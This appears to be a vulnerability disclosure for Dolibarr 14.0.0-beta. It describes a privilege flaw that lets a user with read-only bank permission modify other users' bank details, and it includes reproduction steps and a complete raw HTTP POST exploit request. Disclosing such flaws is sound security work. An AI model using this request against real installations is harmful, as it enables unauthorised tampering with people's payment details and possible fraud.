💥 BUG

unprivileged user can attach bank to another user.

💥 IMPACT

user who dont have any access in "users and groups" can update users bank details

💥 TESTED VERSION

dolibarr 14.0.0-beta

💥 STEP TO REPRODUCE

1. First goto admin account and add user B as normal user .
Now give user B bellow permission for Banks and cash module .

--->Read financial accounts

Now dont give any permission for Users & Groups module .

So, user B cant see or update any users details .Also cant update users bank details

2. Now from admin account goto HR and Bank of any other user by visiting url like http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1.
And here add a bank details .

3. Finally goto user B account and sent bellow request to update bank details .

POST /dolibarr-develop/htdocs/user/bank.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1&bankid=1&action=edit
Cookie:  DOLSESSID_8e8881ad773ee74880c453666c22c288=kd3isa1fp3c53e419fgn79lilo
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

token=$2y$10$wc1M5v3Z56ITbdACetnEPu7M6Nc/xILSazkIEvhhNDwtnC4tTEvr2&action=update&id=1&bankid=1&label=cbbcbbb_by_user&bank=hghgg+by_users&number=&iban=856345255&bic=654555&domiciliation=&proprio=&owner_address=

So, user B dont have any "users and groups" permission and also has read-only permission in bank can update other user bank details .